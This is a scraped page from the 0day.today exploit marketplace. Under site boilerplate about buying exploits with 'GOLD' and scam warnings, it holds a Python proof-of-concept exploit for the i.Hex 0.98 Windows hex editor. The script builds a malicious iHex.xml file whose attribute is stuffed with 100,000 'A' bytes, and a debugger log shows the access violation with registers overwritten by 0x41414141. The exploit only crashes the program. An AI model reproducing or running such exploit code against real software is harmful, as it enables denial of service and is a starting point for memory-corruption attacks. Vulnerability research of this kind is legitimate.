0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

i.Hex Local Crash Proof of Concept Exploit

Author

metacom

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

#!/usr/bin/python
#Exploit Title:i.Hex Local Crash Poc
#Homepage:http://www.memecode.com/ihex.php
#Software Link:www.memecode.com/data/ihex-win32-v0.98.exe
#Version:i.Hex-v0.98 (Win32 Release)
#Description:i.Hex is a small and free graphical Hex Editor for Windows..
#Tested on:Win7 32bit 
#Exploit Author:metacom --> twitter.com/m3tac0m
#Date:05.11.2014
'''
Immunity Debugger Log data
EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01363FA0
ESP 0012F6D8
EBP 0012F700
ESI 0135B8F0
EDI 005F0000
EIP 77B85FBD ntdll.77B85FBD

Press Shift+9
Log data, item 0
Address=77B85B44
Message=[15:56:05] Access violation when reading [41414141]
'''
print "\n[*]Vulnerable Created iHex.xml!"
print "[*]Copy iHex.xml to C:\Program Files\Memecode\i.Hex"
print "[*]Start i.Hex"
print "[*]------------------------------------------------"
poc="\x41" * 100000
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x49\x73\x48\x65\x78\x3d\x22\x31\x22\x0a\x09"
header += "\x20\x4c\x69\x74\x74\x6c\x65\x45\x6e\x64\x69\x61\x6e\x3d\x22\x0a" + poc
footer = "\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x31\x30\x30\x2c\x31\x30\x30\x2c\x35\x30\x30\x2c\x34\x30\x30\x22\x3e\x0a\x09\x3c\x4d"
footer += "\x72\x75\x20\x49\x74\x65\x6d\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f"
footer += "\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"
payload= header + footer
# Write out our malicious file
writeFile = open ("iHex.xml", "wb")
writeFile.write( payload )
writeFile.close()

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

i.Hex Local Crash Proof of Concept Exploit

Report Error

Report Error